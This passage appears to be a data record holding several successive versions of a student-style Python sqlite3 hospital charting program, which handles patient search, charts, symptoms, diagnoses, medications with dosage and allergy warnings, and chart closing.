rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? 
AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-3": "<mask token>\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n c.execute(\n \"\"\"SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n \"\"\"\n , (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count) + ': chart id: ' + x[0] + '; patient hcno: ' + x[1\n ] + '; admission time: ' + x[2], end='')\n if x[3] is None:\n print(' discharge time: ' + 'Status: open.')\n checkOpenChart = checkOpenChart + 1\n else:\n print(' discharge time: ' + x[3] + 'Status: close.')\n count = count + 1\n if checkOpenChart == 0:\n print('No open chart')\n openChart = input('Do you want to create a new chart (y/n):')\n if openChart == 'y':\n print('Open chart')\n return addChart(CONN, staff, patient)\n else:\n print('')\n print(\n 'You have an open chart. If you want a new chart, close the open chart first'\n )\n try:\n select = input(\n \"Please select a chart to continue(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select) - 1\n chart_id = rows[selectChart][0]\n except:\n print('Invalid enry')\n return patientChart(CONN, staff, patient)\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n print('symptoms table')\n c.execute(\n \"\"\"SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('diagnosis table')\n c.execute(\n \"\"\"SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('medication table')\n c.execute(\n \"\"\"SELECT * \n FROM medications \n WHERE hcno = ? AND chart_id = ?\n ORDER BY mdate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n if editAble == 0:\n input('Press any key to return: ')\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff)\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. 
Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? 
AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-4": "import sqlite3\nimport os\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n c.execute(\n \"\"\"SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n \"\"\"\n , (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count) + ': chart id: ' + x[0] + '; patient hcno: ' + x[1\n ] + '; admission time: ' + x[2], end='')\n if x[3] is None:\n print(' discharge time: ' + 'Status: open.')\n checkOpenChart = checkOpenChart + 1\n else:\n print(' discharge time: ' + x[3] + 'Status: close.')\n count = count + 1\n if checkOpenChart == 0:\n print('No open chart')\n openChart = input('Do you want to create a new chart (y/n):')\n if openChart == 'y':\n print('Open chart')\n return addChart(CONN, staff, patient)\n else:\n print('')\n print(\n 'You have an open chart. If you want a new chart, close the open chart first'\n )\n try:\n select = input(\n \"Please select a chart to continue(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select) - 1\n chart_id = rows[selectChart][0]\n except:\n print('Invalid enry')\n return patientChart(CONN, staff, patient)\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n print('symptoms table')\n c.execute(\n \"\"\"SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('diagnosis table')\n c.execute(\n \"\"\"SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('medication table')\n c.execute(\n \"\"\"SELECT * \n FROM medications \n WHERE hcno = ? AND chart_id = ?\n ORDER BY mdate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n if editAble == 0:\n input('Press any key to return: ')\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff)\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. 
Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? 
AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-5": "import sqlite3\nimport os\n\n#Search for a patient name\n#Every doctor enter a name, it will find the patinet name that is similar to the patient name\n#Once a match is found, the system will output a list of matched patient names.\n#Then, the doctor select the patient to continue\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print(\"Search for Patient\")\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n #return doctorMenu(CONN, staff[0])\n return\n c.execute('''SELECT hcno, name FROM patients WHERE name LIKE ?''', ('%'+select+'%',))\n rows = c.fetchall()\n if len(rows) == 0: \n print(\"No patient found, please try again\")\n return patientSelect(CONN, staff)\n\n count = 1\n for x in rows:\n print(str(count)+\": patient hcno \"+x[0]+\"; patient name: \"+x[1])\n count = count + 1\n\n try:\n select = input(\"Please select your patient: \")\n selectedPatient = int(select)-1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = (patientHCNO, patientName)\n except:\n print(\"Invalid input, please try again\")\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n#Output the tables related to the patient\n#The doctor can select an open chart to continue\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n\n print(\"Patient HCNO: \" + patient[0] + \", Patient Name: \" + patient[1])\n c.execute('''SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n ''', (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count)+\": chart id: \"+x[0]+\"; patient hcno: \"+ x[1] + \"; admission time: \"+x[2], end=\"\")\n if x[3] is None:\n print(\" discharge time: \" + \"Status: open.\")\n checkOpenChart = checkOpenChart + 1\n else:\n print(\" discharge time: \" + x[3] + \"Status: close.\")\n count = count + 1;\n if checkOpenChart == 0:\n print(\"No open chart\")\n openChart = input(\"Do you want to create a new chart (y/n):\")\n if openChart == 'y':\n print(\"Open chart\")\n return addChart(CONN, staff, patient)\n else:\n print(\"\")\n print(\"You have an open chart. If you want a new chart, close the open chart first\")\n\n try:\n select = input(\"Please select a chart to continue(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select)-1\n chart_id = rows[selectChart][0] \n except:\n print(\"Invalid enry\")\n return patientChart(CONN, staff, patient)\n\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n#View a list of charts that related to the patient\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print(\"Patient HCNO: \" + patient[0] + \", Patient Name: \" + patient[1])\n print(\"symptoms table\")\n c.execute('''SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print(\"diagnosis table\")\n c.execute('''SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print(\"medication table\")\n c.execute('''SELECT * \n FROM medications \n WHERE hcno = ? 
AND chart_id = ?\n ORDER BY mdate;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n\n if editAble == 0:\n input(\"Press any key to return: \")\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff) \n\n#If the chart is open, able to edit the chart\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print(\"==========Chart Menu==========\")\n print(\"1. Add a symptoms\")\n print(\"2. Add a Diagnosis\")\n print(\"3. Add a medication\")\n print(\"4. Exit\")\n select = input(\"Please select an option to continue: \")\n if select == '1':\n print(\"Add symptoms\")\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print(\"Add Diagnosis\")\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print(\"Add medication\")\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print(\"Invalid entry, please try again\")\n return patientSelect(CONN, staff)\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print(\"Chart Menu\")\n print(\"1. Add a symptoms\")\n print(\"2. close chart\")\n print(\"3. Exit\")\n select = input(\"Please select an option to cintinue: \")\n\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print(\"xx\")\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print(\"Invalid, please try again\")\n return patientSelect(CONN, staff)\n#Insert a symptom\n#Ask doctor for symptom name\n#Observer date will be current time\n# The function will return to viewChart()\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input(\"Please enter a symptom: \")\n while len(symptoms) == 0:\n symptoms = input(\"Please enter a symptom: \")\n \n c.execute('''INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);''',(patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n# Insert a diagnosis\n# Will prompt for a diagnose name\n# Observe date will be current time\n# Return to viewChart() after finish\ndef addDiagnosis(CONN, patient, chart_id, staff):\n #Insert a diagnosis\n c = CONN.cursor()\n diagnosis = input(\"Please enter a diagnosis: \")\n while len(diagnosis) == 0:\n diagnosis = input(\"Please enter a diagnosis: \")\n \n c.execute('''INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);''',(patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n# Insert a medication\n# Will prompt for a medication name\n# start date will be today\n# Return to viewChart() after finish\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute(\"SELECT * FROM patients WHERE hcno = ?;\",(patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n\n #Get Medication Name, if not exist in database, return to previous page\n medicationName = input(\"Please enter a medication: \")\n c.execute(\"SELECT sug_amount FROM dosage WHERE drug_name = ? 
AND age_group = ?;\", (medicationName,patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print(\"Drug Name not exist\")\n input(\"Press any key to return\")\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n c.execute('''SELECT drug_name FROM reportedallergies WHERE hcno = ?;''', (patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print(\"WARNING, the patinet is allergic to \"+ x)\n c.execute('''SELECT canbe_alg FROM inferredallergies WHERE alg = ?;''',(medicationName,))\n \n inferallergies = c.fetchall()\n for x in inferallergies:\n print(\"Patinet can be allergic to: \" + x[0])\n\n # Get prescripbtion amount, if larger than suggest amount, display warning message\n amount = int(input(\"Medication amount: \"))\n if amount > dosageAmount[0]:\n print(\"Suggest Amount: \"+ str(dosageAmount[0]))\n confirm = input(\"WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)\")\n\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n \n #Get medication period\n day = input(\"Medication length(in days): \")\n\n c.execute('''INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);''',(patient[0], chart_id, staff[0], '+'+day+' day', amount, medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute(\"SELECT * FROM charts WHERE chart_id = ?;\", (chart_id,))\n rows = c.fetchone()\n\n if rows[3] is None:\n print(\"Close chart id \"+str(chart_id)+\"?\")\n print(\"1. Yes.\")\n print(\"2. No.\")\n result = input(\"Please enter your choice: \")\n if result == '1':\n print(\"Closing chart.\")\n c.execute('''UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;''', (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print(\"Invalid\")\n return closeChart(CONN, patient, chart_id, staff)\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print(\"==========New Patient Record==========\")\n\n name = input(\"Please enter patient name: \")\n \n hcno = input(\"Please enter patient HCNO: \")\n try:\n testHcno = int(hcno)\n except:\n print(\"Invalid HCNO, please try again\")\n return addPatient(CONN, staff)\n age_group = input(\"Please enter age group: \")\n address = input(\"Please enter address: \")\n phone = input(\"Please enter phone number: \")\n emg_phone = input(\"Please enter emergency phone number: \")\n 